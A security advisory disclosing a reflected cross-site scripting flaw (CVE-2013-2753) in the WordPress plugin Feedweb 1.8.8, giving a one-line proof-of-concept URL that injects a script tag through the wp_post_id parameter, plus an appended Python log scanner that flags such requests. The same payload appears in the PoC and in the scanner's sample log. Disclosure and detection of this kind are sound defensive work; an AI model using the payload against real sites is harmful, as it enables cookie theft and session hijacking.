SSCHADV2013-004 - WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability
Advisory: WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-004
Author: Stefan Schurtz
Affected Software: Successfully tested on Feedweb 1.8.8
Vendor URL:
Vendor Status: fixed
CVE-ID: CVE-2013-2753
======================
Vulnerability Description
======================
The WordPress plugin 'Feedweb 1.8.8' is prone to an XSS vulnerability.
==============
PoC-Exploit
==============
// with authenticated admin user
http://[target]/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=</script><script>alert(document.cookie)</script>
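As an added defender-side example (not part of the advisory or of the plugin), a small Python scanner over constructed web-server access-log lines that flags requests to widget_remove.php whose wp_post_id is not a plain integer, which is the check a legitimate post id must pass; the log lines, IPs and timestamps are made up for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2013:10:00:01 +0000] "GET /wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Mar/2013:10:00:07 +0000] "GET /wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Mar/2013:10:00:09 +0000] "GET /wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=7abc HTTP/1.1" 200 600 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Mar/2013:10:00:12 +0000] "GET /wordpress/index.php?p=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target from one combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# Path of the affected script, as given in the advisory's PoC.
VULN_PATH = "/wp-content/plugins/feedweb/widget_remove.php"
POST_ID_RE = re.compile(r"^\d+$")


def is_valid_post_id(value: str) -> bool:
    """A WordPress post id is a non-negative integer; anything else is not a legitimate value."""
    return POST_ID_RE.fullmatch(value) is not None


def find_suspicious_requests(log_text: str) -> list:
    """Return one finding per wp_post_id value that is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VULN_PATH):
            continue
        # parse_qs already percent-decodes the values.
        for value in parse_qs(parts.query, keep_blank_values=True).get("wp_post_id", []):
            if is_valid_post_id(value):
                continue
            reason = ("script tag in value"
                      if re.search(r"<\s*/?\s*script", value, re.I) else "non-numeric value")
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "value": value, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} wp_post_id={f['value']!r}: {f['reason']}")
```

The same integer check, applied server-side before the value is echoed into the page, is what removes the injection point; the scanner only tells you whether anyone tried it.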
=====
Solution
=====
Update to the latest version 1.9
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
01-Apr-2013 – fixed by developer
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======